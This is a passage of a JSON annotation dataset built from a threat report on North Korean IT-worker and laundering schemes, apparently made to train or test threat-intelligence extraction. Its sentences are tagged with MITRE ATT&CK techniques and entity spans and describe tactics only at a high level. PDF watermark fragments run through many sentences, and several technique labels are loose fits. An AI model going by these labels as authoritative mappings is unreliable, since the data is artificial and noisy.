"79_mitre_report", "page_number": 37, "sentence_id": 281, "context_before": "This will have to cover a few major requirements to prepare candidates for successful employment:\n• English speaking: Candidates must have a good English-speaking background to converse comfortably with interviewers in the U.S.\n• Technical knowledge: Candidates must have the right technical knowledge (as developed by skill trainers or identified through freelance platforms) for the job at hand •", "sentence_text": "Financial Account Applications: Used by payment facilitators/launderers to funnel funds through various accounts, especially through the use of cryptocurrencies to bypass sanctions.", "relevant": "yes", "tactic": [ { "id": "TA0040", "name": "Impact" } ], "techniques": [ { "id": "T1657", "name": "Financial Theft" } ], "procedure": "Uses financial accounts and cryptocurrencies to funnel funds and bypass sanctions", "entities": [ { "text": "Financial Account Applications", "start": 0, "end": 30, "label": "Infrastructure_Indicator" }, { "text": "cryptocurrencies ", "start": 144, "end": 161, "label": "Infrastructure_Indicator" }, { "text": "funnel funds", "start": 75, "end": 87, "label": "Action" }, { "text": "bypass sanctions", "start": 164, "end": 180, "label": "Action" } ] }, { "uid": "mitre-79_mitre_report-p37-s282-8378fb", "source": "mitre", "doc_id": "79_mitre_report", "page_number": 37, "sentence_id": 282, "context_before": "Financial Account Applications: Used by payment facilitators/launderers to funnel funds through various accounts, especially through the use of cryptocurrencies to bypass sanctions.", "sentence_text": "Money Launderers: The money launderers may communicate with other cryptocurrency or avoidance specialists to bypass any sanctions and convert funds, or they themselves could be experts in this.", "relevant": "yes", "tactic": [ { "id": "TA0040", "name": "Impact" } ], "techniques": [ { "id": "T1657", "name": "Financial Theft" } ], "procedure": "Uses cryptocurrency specialists to bypass sanctions and convert funds", "entities": [ { "text": "Money Launderers", "start": 0, "end": 16, "label": "ThreatActor" }, { "text": "cryptocurrency ", "start": 66, "end": 81, "label": "Infrastructure_Indicator" }, { "text": "convert funds", "start": 134, "end": 147, "label": "Action" }, { "text": " bypass any sanctions", "start": 108, "end": 129, "label": "Action" } ] }, { "uid": "mitre-79_mitre_report-p37-s283-407d33", "source": "mitre", "doc_id": "79_mitre_report", "page_number": 37, "sentence_id": 283, "context_before": "Money Launderers: The money launderers may communicate with other cryptocurrency or avoidance specialists to bypass any sanctions and convert funds, or they themselves could be experts in this.", "sentence_text": "Behavioral Indicators Reveal Non-State Facilitators in DPRK ITW Activity 37 DTEX Insider Intelligence and Investigations (i3) analysis has determined that a singular focus on APT attribution risks overlooking key elements of DPRK’s ITW operational schemes.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-79_mitre_report-p37-s284-46e473", "source": "mitre", "doc_id": "79_mitre_report", "page_number": 37, "sentence_id": 284, "context_before": "Behavioral Indicators Reveal Non-State Facilitators in DPRK ITW Activity 37 DTEX Insider Intelligence and Investigations (i3) analysis has determined that a singular focus on APT attribution risks overlooking key elements of DPRK’s ITW operational schemes.", "sentence_text": "IT\nBehavioral signals—particularly those observed post-pandemic within the Overemployed HIDDEN community—enabled early identification of DPRK-linked ITW activity.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-79_mitre_report-p37-s285-0f9aa0", "source": "mitre", "doc_id": "79_mitre_report", "page_number": 37, "sentence_id": 285, "context_before": "IT\nBehavioral signals—particularly those observed post-pandemic within the Overemployed HIDDEN community—enabled early identification of DPRK-linked ITW activity.", "sentence_text": "These indicators AND surfaced well before traditional attribution processes confirmed state involvement.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-79_mitre_report-p37-s286-0b7f4c", "source": "mitre", "doc_id": "79_mitre_report", "page_number": 37, "sentence_id": 286, "context_before": "These indicators AND surfaced well before traditional attribution processes confirmed state involvement.", "sentence_text": "CYBER DPRK’S EXPOSING", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-79_mitre_report-p38-s287-0e4160", "source": "mitre", "doc_id": "79_mitre_report", "page_number": 38, "sentence_id": 287, "context_before": "CYBER DPRK’S EXPOSING", "sentence_text": "The below graphics detail the day-to-day communication and coordination of operations between members of related ITW teams in 2023.", "relevant": "yes", "tactic": [ { "id": "TA0042", "name": "Resource Development" } ], "techniques": [ { "id": "T1587", "name": "Develop Capabilities" } ], "procedure": "Coordinates operations and communicates between ITW team members", "entities": [ { "text": "ITW ", "start": 113, "end": 117, "label": "ThreatActor" }, { "text": "coordination ", "start": 59, "end": 72, "label": "Action" }, { "text": "communication ", "start": 41, "end": 55, "label": "Action" } ] }, { "uid": "mitre-79_mitre_report-p38-s288-993029", "source": "mitre", "doc_id": "79_mitre_report", "page_number": 38, "sentence_id": 288, "context_before": "The below graphics detail the day-to-day communication and coordination of operations between members of related ITW teams in 2023.", "sentence_text": "It is assessed that when communicating with external ITW teams, a continuance of their relationships in training and in school persists.", "relevant": "yes", "tactic": [ { "id": "TA0042", "name": "Resource Development" } ], "techniques": [ { "id": "T1587", "name": "Develop Capabilities" } ], "procedure": "Maintains relationships from training/school when communicating with external ITW teams", "entities": [ { "text": "ITW ", "start": 53, "end": 57, "label": "ThreatActor" }, { "text": "communicating ", "start": 25, "end": 39, "label": "Action" } ] }, { "uid": "mitre-79_mitre_report-p38-s289-5922ae", "source": "mitre", "doc_id": "79_mitre_report", "page_number": 38, "sentence_id": 289, "context_before": "It is assessed that when communicating with external ITW teams, a continuance of their relationships in training and in school persists.", "sentence_text": "WORKFORCE\nIT\nHIDDEN\nAND\nSYNDICATE\nCYBER\nDPRK’S\nEXPOSING", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-79_mitre_report-p39-s290-a3b221", "source": "mitre", "doc_id": "79_mitre_report", "page_number": 39, "sentence_id": 290, "context_before": "WORKFORCE\nIT\nHIDDEN\nAND\nSYNDICATE\nCYBER\nDPRK’S\nEXPOSING", "sentence_text": "WORKFORCE\nIT\nHIDDEN\nAND\nSYNDICATE\nCYBER\nDPRK’S\nEXPOSING", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-79_mitre_report-p40-s291-d8b95f", "source": "mitre", "doc_id": "79_mitre_report", "page_number": 40, "sentence_id": 291, "context_before": "WORKFORCE\nIT\nHIDDEN\nAND\nSYNDICATE\nCYBER\nDPRK’S\nEXPOSING", "sentence_text": "The below images show communications between IT workers and their multiple facilitators as they transfer money from U.S. financial institutions to Hong Kong-based front companies to funnel and launder money back to their units.", "relevant": "yes", "tactic": [ { "id": "TA0040", "name": "Impact" } ], "techniques": [ { "id": "T1657", "name": "Financial Theft" } ], "procedure": "Transfers money from U.S. financial institutions to Hong Kong front companies for money laundering", "entities": [ { "text": " IT workers ", "start": 44, "end": 56, "label": "ThreatActor" }, { "text": " U.S. financial institutions", "start": 115, "end": 143, "label": "Infrastructure_Indicator" }, { "text": "Hong Kong-based front companies ", "start": 147, "end": 179, "label": "Infrastructure_Indicator" }, { "text": "transfer money", "start": 96, "end": 110, "label": "Action" }, { "text": "funnel", "start": 182, "end": 188, "label": "Action" }, { "text": "launder money", "start": 193, "end": 206, "label": "Action" } ] }, { "uid": "mitre-79_mitre_report-p40-s292-f0677e", "source": "mitre", "doc_id": "79_mitre_report", "page_number": 40, "sentence_id": 292, "context_before": "The below images show communications between IT workers and their multiple facilitators as they transfer money from U.S. financial institutions to Hong Kong-based front companies to funnel and launder money back to their units.", "sentence_text": "These images are from the same team but in 2025.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-79_mitre_report-p40-s293-e9f59b", "source": "mitre", "doc_id": "79_mitre_report", "page_number": 40, "sentence_id": 293, "context_before": "These images are from the same team but in 2025.", "sentence_text": "These images also highlight TTPs in bypassing multifactor authentication for WORKFORCE IT HIDDEN AND SYNDICATE CYBER DPRK’S EXPOSING", "relevant": "yes", "tactic": [ { "id": "TA0006", "name": "Credential Access" } ], "techniques": [ { "id": "T1111", "name": "Multi-Factor Authentication Interception" } ], "procedure": "Bypasses multifactor authentication", "entities": [ { "text": " DPRK", "start": 116, "end": 121, "label": "ThreatActor" }, { "text": "bypassing multifactor authentication ", "start": 36, "end": 73, "label": "Action" } ] }, { "uid": "mitre-79_mitre_report-p41-s294-52fc8f", "source": "mitre", "doc_id": "79_mitre_report", "page_number": 41, "sentence_id": 294, "context_before": "These images also highlight TTPs in bypassing multifactor authentication for WORKFORCE IT HIDDEN AND SYNDICATE CYBER DPRK’S EXPOSING", "sentence_text": "Overarching Units\nand Colleges\nThe following section outlines notable locations mentioned in this report.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-79_mitre_report-p41-s295-ba9c55", "source": "mitre", "doc_id": "79_mitre_report", "page_number": 41, "sentence_id": 295, "context_before": "Overarching Units\nand Colleges\nThe following section outlines notable locations mentioned in this report.", "sentence_text": "Each entry includes relevant background or contextual details to provide additional geographic and operational clarity.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-79_mitre_report-p41-s296-fdbb7e", "source": "mitre", "doc_id": "79_mitre_report", "page_number": 41, "sentence_id": 296, "context_before": "Each entry includes relevant background or contextual details to provide additional geographic and operational clarity.", "sentence_text": "Korean People’s Army (KPA)\nKPA is the armed forces of North Korea and the central institution of the country’s military establishment, operating under the guidance of the Workers’ Party of Korea (WPK).", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-79_mitre_report-p41-s297-ee905f", "source": "mitre", "doc_id": "79_mitre_report", "page_number": 41, "sentence_id": 297, "context_before": "Korean People’s Army (KPA)\nKPA is the armed forces of North Korea and the central institution of the country’s military establishment, operating under the guidance of the Workers’ Party of Korea (WPK).", "sentence_text": "It is one of the largest standing militaries in the world, with an estimated 1.2 million active personnel and several million more in reserve.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-79_mitre_report-p41-s298-4da71c", "source": "mitre", "doc_id": "79_mitre_report", "page_number": 41, "sentence_id": 298, "context_before": "It is one of the largest standing militaries in the world, with an estimated 1.2 million active personnel and several million more in reserve.", "sentence_text": "The KPA plays a critical role not only in national defense but also in domestic economic activities and political enforcement.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-79_mitre_report-p41-s299-1498c4", "source": "mitre", "doc_id": "79_mitre_report", "page_number": 41, "sentence_id": 299, "context_before": "The KPA plays a critical role not only in national defense but also in domestic economic activities and political enforcement.", "sentence_text": "The KPA’s influence extends beyond traditional military functions, shaping North Korean society and serving as a key tool for maintaining regime stability.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-79_mitre_report-p41-s300-a71edc", "source": "mitre", "doc_id": "79_mitre_report", "page_number": 41, "sentence_id": 300, "context_before": "The KPA’s influence extends beyond traditional military functions, shaping North Korean society and serving as a key tool for maintaining regime stability.", "sentence_text": "Established in 2009 HIDDEN through the consolidation of various intelligence entities, the RGB reports directly to the AND KPA and ultimately to the leadership of the DPRK.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-79_mitre_report-p42-s302-06bb93", "source": "mitre", "doc_id": "79_mitre_report", "page_number": 42, "sentence_id": 302, "context_before": "EXPOSING", "sentence_text": "Research Center 227", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-79_mitre_report-p42-s303-11c07f", "source": "mitre", "doc_id": "79_mitre_report", "page_number": 42, "sentence_id": 303, "context_before": "Research Center 227", "sentence_text": "A new AI-centric entity within North Korea’s cyber operations framework that, according to reports, was established in late February 2025 under the directive of North Korean leadership, aiming to enhance the country’s overseas information warfare capabilities.", "relevant": "yes", "tactic": [ { "id": "TA0042", "name": "Resource Development" } ], "techniques": [ { "id": "T1587", "name": "Develop Capabilities" } ], "procedure": "Established AI-centric entity to enhance overseas information warfare capabilities", "entities": [ { "text": "North Korea", "start": 31, "end": 42, "label": "ThreatActor" }, { "text": "AI-centric entity", "start": 6, "end": 23, "label": "Infrastructure_Indicator" }, { "text": "established ", "start": 104, "end": 116, "label": "Action" }, { "text": "enhance ", "start": 196, "end": 204, "label": "Action" } ] }, { "uid": "mitre-79_mitre_report-p42-s304-e1552a", "source": "mitre", "doc_id": "79_mitre_report", "page_number": 42, "sentence_id": 304, "context_before": "A new AI-centric entity within North Korea’s cyber operations framework that, according to reports, was established in late February 2025 under the directive of North Korean leadership, aiming to enhance the country’s overseas information warfare capabilities.", "sentence_text": "Operating under RGB, Research Center 227 focuses on developing offensive hacking technologies and programs intended to neutralize Western cybersecurity systems and critical infrastructure.", "relevant": "yes", "tactic": [ { "id": "TA0040", "name": "Impact" } ], "techniques": [ { "id": "T1587", "name": "Develop Capabilities" } ], "procedure": "Develops offensive technologies to neutralize Western cybersecurity and critical infrastructure", "entities": [ { "text": "RGB", "start": 16, "end": 19, "label": "ThreatActor" }, { "text": "Research Center 227", "start": 21, "end": 40, "label": "ThreatActor" }, { "text": "Western cybersecurity systems", "start": 130, "end": 159, "label": "Infrastructure_Indicator" }, { "text": " critical infrastructure", "start": 163, "end": 187, "label": "Infrastructure_Indicator" }, { "text": "developing ", "start": 52, "end": 63, "label": "Action" }, { "text": "neutralize ", "start": 119, "end": 130, "label": "Action" } ] }, { "uid": "mitre-79_mitre_report-p42-s305-a8f8fe", "source": "mitre", "doc_id": "79_mitre_report", "page_number": 42, "sentence_id": 305, "context_before": "Operating under RGB, Research Center 227 focuses on developing offensive hacking technologies and programs intended to neutralize Western cybersecurity systems and critical infrastructure.", "sentence_text": "Korean Workers’ Party (KWP)\nThe Korean Workers’ Party (KWP) is North Korea’s dominant political entity, holding a monopoly on power since its founding in 1946.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-79_mitre_report-p42-s306-7d4585", "source": "mitre", "doc_id": "79_mitre_report", "page_number": 42, "sentence_id": 306, "context_before": "Korean Workers’ Party (KWP)\nThe Korean Workers’ Party (KWP) is North Korea’s dominant political entity, holding a monopoly on power since its founding in 1946.", "sentence_text": "The KWP directly oversees various intelligence and military units, including those responsible for offensive cyber operations.", "relevant": "yes", "tactic": [ { "id": "TA0042", "name": "Resource Development" } ], "techniques": [ { "id": "T1587", "name": "Develop Capabilities" } ], "procedure": "Oversees intelligence and military units conducting offensive cyber operations", "entities": [ { "text": "KWP ", "start": 4, "end": 8, "label": "ThreatActor" }, { "text": "oversees ", "start": 17, "end": 26, "label": "Action" } ] }, { "uid": "mitre-79_mitre_report-p42-s307-fa4e14", "source": "mitre", "doc_id": "79_mitre_report", "page_number": 42, "sentence_id": 307, "context_before": "The KWP directly oversees various intelligence and military units, including those responsible for offensive cyber operations.", "sentence_text": "DPRK’S EXPOSING", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-79_mitre_report-p43-s308-fa8300", "source": "mitre", "doc_id": "79_mitre_report", "page_number": 43, "sentence_id": 308, "context_before": "DPRK’S EXPOSING", "sentence_text": "Operating under the Central Committee of the KWP, the MID plays a critical role in enhancing North Korea’s military capabilities and ensuring the regime’s self-reliance in defense production.", "relevant": "yes", "tactic": [ { "id": "TA0042", "name": "Resource Development" } ], "techniques": [ { "id": "T1587", "name": "Develop Capabilities" } ], "procedure": "Enhances military capabilities and ensures self-reliance in defense production", "entities": [ { "text": "KWP", "start": 45, "end": 48, "label": "ThreatActor" }, { "text": "MID ", "start": 54, "end": 58, "label": "ThreatActor" }, { "text": "North Korea", "start": 93, "end": 104, "label": "ThreatActor" }, { "text": "ensuring ", "start": 133, "end": 142, "label": "Action" }, { "text": "enhancing ", "start": 83, "end": 93, "label": "Action" } ] }, { "uid": "mitre-79_mitre_report-p43-s309-a38a54", "source": "mitre", "doc_id": "79_mitre_report", "page_number": 43, "sentence_id": 309, "context_before": "Operating under the Central Committee of the KWP, the MID plays a critical role in enhancing North Korea’s military capabilities and ensuring the regime’s self-reliance in defense production.", "sentence_text": "Ministry of National Defense (MND) (국방성)\nLocation: 39° 3’36”N 125°44’13”E North Korea’s MND serves as the central authority responsible for managing and directing the country’s armed forces under the KWP and State Affairs Commission.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-79_mitre_report-p43-s310-aef140", "source": "mitre", "doc_id": "79_mitre_report", "page_number": 43, "sentence_id": 310, "context_before": "Ministry of National Defense (MND) (국방성)\nLocation: 39° 3’36”N 125°44’13”E North Korea’s MND serves as the central authority responsible for managing and directing the country’s armed forces under the KWP and State Affairs Commission.", "sentence_text": "Its activities are closely integrated with other WORKFORCEagencies involved in security and intelligence, reflecting North Korea’s highly centralized and IT tightly controlled military structure.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-79_mitre_report-p43-s311-5fa554", "source": "mitre", "doc_id": "79_mitre_report", "page_number": 43, "sentence_id": 311, "context_before": "Its activities are closely integrated with other WORKFORCEagencies involved in security and intelligence, reflecting North Korea’s highly centralized and IT tightly controlled military structure.", "sentence_text": "HIDDEN AND SYNDICATE CYBER DPRK’S EXPOSING", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-79_mitre_report-p44-s312-e849fe", "source": "mitre", "doc_id": "79_mitre_report", "page_number": 44, "sentence_id": 312, "context_before": "HIDDEN AND SYNDICATE CYBER DPRK’S EXPOSING", "sentence_text": "Kumsong Academy\nThe campus includes Kumsong No.1 Secondary School that offers intensive (금성제1중학교)\ncomputer education courses to gifted students.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-79_mitre_report-p44-s313-04920d", "source": "mitre", "doc_id": "79_mitre_report", "page_number": 44, "sentence_id": 313, "context_before": "Kumsong Academy\nThe campus includes Kumsong No.1 Secondary School that offers intensive (금성제1중학교)\ncomputer education courses to gifted students.", "sentence_text": "It is visited by foreign delegations to look around as a centerpiece of North Korea’s education system.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-79_mitre_report-p44-s314-58720e", "source": "mitre", "doc_id": "79_mitre_report", "page_number": 44, "sentence_id": 314, "context_before": "It is visited by foreign delegations to look around as a centerpiece of North Korea’s education system.", "sentence_text": "The computer school campus is housed in a large, eight story building alongside the main building.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-79_mitre_report-p44-s316-c59d73", "source": "mitre", "doc_id": "79_mitre_report", "page_number": 44, "sentence_id": 316, "context_before": "Kumsong Academy\nin (금성학원)", "sentence_text": "Pyongyang’s Mangyondae District is one of North Korea’s centers of computing expertise.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-79_mitre_report-p44-s317-4d154c", "source": "mitre", "doc_id": "79_mitre_report", "page_number": 44, "sentence_id": 317, "context_before": "Pyongyang’s Mangyondae District is one of North Korea’s centers of computing expertise.", "sentence_text": "The same site is/was also home to the IT center of the Pyongyang International Information 44Centre of New Technology and Economy (PIINTEC)", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-79_mitre_report-p44-s319-cd44c5", "source": "mitre", "doc_id": "79_mitre_report", "page_number": 44, "sentence_id": 319, "context_before": "(a.k.a. (평양국제새기술경제정보센터)\nPyongyang International New Technology and Economic Information Company).", "sentence_text": "The organization was established in October 2003 to promote international knowledge exchange in areas including information technology.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-79_mitre_report-p44-s320-948974", "source": "mitre", "doc_id": "79_mitre_report", "page_number": 44, "sentence_id": 320, "context_before": "The organization was established in October 2003 to promote international knowledge exchange in areas including information technology.", "sentence_text": "Among its stated activities is the dissemination of WORKFORCEforeign scientific and IT information on the local intranet.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-79_mitre_report-p44-s321-bae7a8", "source": "mitre", "doc_id": "79_mitre_report", "page_number": 44, "sentence_id": 321, "context_before": "Among its stated activities is the dissemination of WORKFORCEforeign scientific and IT information on the local intranet.", "sentence_text": "IT the Pyongyang AND International Information Centre of New Technology and Economy SYNDICATE (PIINTEC).", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-79_mitre_report-p44-s322-402fc6", "source": "mitre", "doc_id": "79_mitre_report", "page_number": 44, "sentence_id": 322, "context_before": "IT the Pyongyang AND International Information Centre of New Technology and Economy SYNDICATE (PIINTEC).", "sentence_text": "CYBER DPRK’S EXPOSING", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-79_mitre_report-p45-s323-370ca7", "source": "mitre", "doc_id": "79_mitre_report", "page_number": 45, "sentence_id": 323, "context_before": "CYBER DPRK’S EXPOSING", "sentence_text": "It also said it planned to send North Korean IT experts to “foreign universities and companies for training and research on the development of OS programs using Linux tools and network services.”", "relevant": "yes", "tactic": [ { "id": "TA0042", "name": "Resource Development" } ], "techniques": [ { "id": "T1587", "name": "Develop Capabilities" } ], "procedure": "Sends IT experts to foreign universities/companies for training on Linux OS and network services", "entities": [ { "text": "North Korean ", "start": 32, "end": 45, "label": "ThreatActor" }, { "text": "foreign universities and companies", "start": 60, "end": 94, "label": "Infrastructure_Indicator" }, { "text": "OS programs", "start": 143, "end": 154, "label": "Infrastructure_Indicator" }, { "text": " Linux tools", "start": 160, "end": 172, "label": "Infrastructure_Indicator" }, { "text": "network services", "start": 177, "end": 193, "label": "Infrastructure_Indicator" }, { "text": "research ", "start": 112, "end": 121, "label": "Action" }, { "text": "send ", "start": 27, "end": 32, "label": "Action" }, { "text": "training ", "start": 99, "end": 108, "label": "Action" } ] }, { "uid": "mitre-79_mitre_report-p45-s324-f1558e", "source": "mitre", "doc_id": "79_mitre_report", "page_number": 45, "sentence_id": 324, "context_before": "It also said it planned to send North Korean IT experts to “foreign universities and companies for training and research on the development of OS programs using Linux tools and network services.”", "sentence_text": "It is unclear if the organization is still in operation.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-79_mitre_report-p45-s325-a4d235", "source": "mitre", "doc_id": "79_mitre_report", "page_number": 45, "sentence_id": 325, "context_before": "It is unclear if the organization is still in operation.", "sentence_text": "During a visit in April 2024, Kim Jong-un said “the main duty of Kim Il Sung Military University to train a larger number of talented military personnel who are fully prepared for modern warfare.”", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-79_mitre_report-p45-s326-92bf97", "source": "mitre", "doc_id": "79_mitre_report", "page_number": 45, "sentence_id": 326, "context_before": "During a visit in April 2024, Kim Jong-un said “the main duty of Kim Il Sung Military University to train a larger number of talented military personnel who are fully prepared for modern warfare.”", "sentence_text": "WORKFORCE\nIT\nHIDDEN\nAND\nCYBER\nDPRK’S\nEXPOSING", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-79_mitre_report-p46-s327-ccc95e", "source": "mitre", "doc_id": "79_mitre_report", "page_number": 46, "sentence_id": 327, "context_before": "WORKFORCE\nIT\nHIDDEN\nAND\nCYBER\nDPRK’S\nEXPOSING", "sentence_text": "The Way Forward Until a RGB cyber operator or high-level IT worker defects and is willing to publicly share their story, we may never know the exact inner workings of DPRK’s cyber ecosystem.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-79_mitre_report-p46-s328-9c0d6d", "source": "mitre", "doc_id": "79_mitre_report", "page_number": 46, "sentence_id": 328, "context_before": "The Way Forward Until a RGB cyber operator or high-level IT worker defects and is willing to publicly share their story, we may never know the exact inner workings of DPRK’s cyber ecosystem.", "sentence_text": "The DPRK is operating with a much more agile cyber force today than a decade ago, which has serious implications for any organization or government that is likely to become a target of DPRK operations.", "relevant": "yes", "tactic": [ { "id": "TA0042", "name": "Resource Development" } ], "techniques": [ { "id": "T1587", "name": "Develop Capabilities" } ], "procedure": "Operates with agile cyber force targeting organizations and governments", "entities": [ { "text": "DPRK ", "start": 185, "end": 190, "label": "ThreatActor" }, { "text": "DPRK ", "start": 4, "end": 9, "label": "ThreatActor" }, { "text": "operating ", "start": 12, "end": 22, "label": "Action" } ] }, { "uid": "mitre-79_mitre_report-p46-s329-8ec969", "source": "mitre", "doc_id": "79_mitre_report", "page_number": 46, "sentence_id": 329, "context_before": "The DPRK is operating with a much more agile cyber force today than a decade ago, which has serious implications for any organization or government that is likely to become a target of DPRK operations.", "sentence_text": "CYBER\nDPRK’S\nEXPOSING", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-79_mitre_report-p47-s330-b2ede3", "source": "mitre", "doc_id": "79_mitre_report", "page_number": 47, "sentence_id": 330, "context_before": "CYBER\nDPRK’S\nEXPOSING", "sentence_text": "What we’re facing is not a collection of isolated threats, but a coordinated ecosystem: elite operatives from sanctioned universities, IT workers embedded inside global companies, and facilitators laundering funds and providing identities.", "relevant": "yes", "tactic": [ { "id": "TA0042", "name": "Resource Development" }, { "id": "TA0040", "name": "Impact" } ], "techniques": [ { "id": "T1587", "name": "Develop Capabilities" }, { "id": "T1657", "name": "Financial Theft" } ], "procedure": "Coordinates ecosystem of operatives, embedded IT workers, and facilitators for funding and identity support", "entities": [ { "text": "elite operatives", "start": 88, "end": 104, "label": "ThreatActor" }, { "text": "IT workers", "start": 135, "end": 145, "label": "ThreatActor" }, { "text": "facilitators ", "start": 184, "end": 197, "label": "ThreatActor" }, { "text": "sanctioned universities", "start": 110, "end": 133, "label": "Infrastructure_Indicator" }, { "text": "global companies", "start": 162, "end": 178, "label": "Infrastructure_Indicator" }, { "text": "embedded ", "start": 146, "end": 155, "label": "Action" }, { "text": "laundering funds", "start": 197, "end": 213, "label": "Action" }, { "text": "providing identities", "start": 218, "end": 238, "label": "Action" } ] }, { "uid": "mitre-79_mitre_report-p47-s331-67fe08", "source": "mitre", "doc_id": "79_mitre_report", "page_number": 47, "sentence_id": 331, "context_before": "What we’re facing is not a collection of isolated threats, but a coordinated ecosystem: elite operatives from sanctioned universities, IT workers embedded inside global companies, and facilitators laundering funds and providing identities.", "sentence_text": "This ecosystem is designed to exploit trust, technology, and complacency.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-79_mitre_report-p47-s332-dda3e0", "source": "mitre", "doc_id": "79_mitre_report", "page_number": 47, "sentence_id": 332, "context_before": "This ecosystem is designed to exploit trust, technology, and complacency.", "sentence_text": "And it’s already inside the walls.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-79_mitre_report-p47-s333-720f65", "source": "mitre", "doc_id": "79_mitre_report", "page_number": 47, "sentence_id": 333, "context_before": "And it’s already inside the walls.", "sentence_text": "Three key insights must drive the next phase of defense:\n•", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-79_mitre_report-p47-s334-f592eb", "source": "mitre", "doc_id": "79_mitre_report", "page_number": 47, "sentence_id": 334, "context_before": "Three key insights must drive the next phase of defense:\n•", "sentence_text": "This is a national security challenge.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-79_mitre_report-p47-s335-532163", "source": "mitre", "doc_id": "79_mitre_report", "page_number": 47, "sentence_id": 335, "context_before": "This is a national security challenge.", "sentence_text": "DPRK operators are embedded in global supply chains and systems.", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" } ], "techniques": [ { "id": "T1195", "name": "Supply Chain Compromise" } ], "procedure": "Embeds operators in global supply chains and systems", "entities": [ { "text": "DPRK ", "start": 0, "end": 5, "label": "ThreatActor" }, { "text": "global supply chains", "start": 31, "end": 51, "label": "Infrastructure_Indicator" }, { "text": "embedded ", "start": 19, "end": 28, "label": "Action" } ] }, { "uid": "mitre-79_mitre_report-p47-s336-3d58a2", "source": "mitre", "doc_id": "79_mitre_report", "page_number": 47, "sentence_id": 336, "context_before": "DPRK operators are embedded in global supply chains and systems.", "sentence_text": "Waiting is not an option.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-79_mitre_report-p47-s338-63c666", "source": "mitre", "doc_id": "79_mitre_report", "page_number": 47, "sentence_id": 338, "context_before": "•", "sentence_text": "Attribution is only the beginning.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-79_mitre_report-p47-s339-36137e", "source": "mitre", "doc_id": "79_mitre_report", "page_number": 47, "sentence_id": 339, "context_before": "Attribution is only the beginning.", "sentence_text": "WORKFORCE IT •", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-79_mitre_report-p47-s340-9b7b4a", "source": "mitre", "doc_id": "79_mitre_report", "page_number": 47, "sentence_id": 340, "context_before": "WORKFORCE IT •", "sentence_text": "The APT vs. IT worker distinction is obsolete.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-79_mitre_report-p47-s341-8eba24", "source": "mitre", "doc_id": "79_mitre_report", "page_number": 47, "sentence_id": 341, "context_before": "The APT vs. IT worker distinction is obsolete.", "sentence_text": "These actors function as one HIDDEN enterprise in support of regime priorities—and they must be understood and AND countered as such.\nSYNDICATE\nCYBER\nDPRK’S\nEXPOSING", "relevant": "yes", "tactic": [ { "id": "TA0042", "name": "Resource Development" } ], "techniques": [ { "id": "T1587", "name": "Develop Capabilities" } ], "procedure": "Functions as unified enterprise supporting regime priorities", "entities": [ { "text": "DPRK", "start": 150, "end": 154, "label": "ThreatActor" }, { "text": "function ", "start": 13, "end": 22, "label": "Action" }, { "text": "support ", "start": 50, "end": 58, "label": "Action" } ] }, { "uid": "mitre-79_mitre_report-p48-s342-b57cf8", "source": 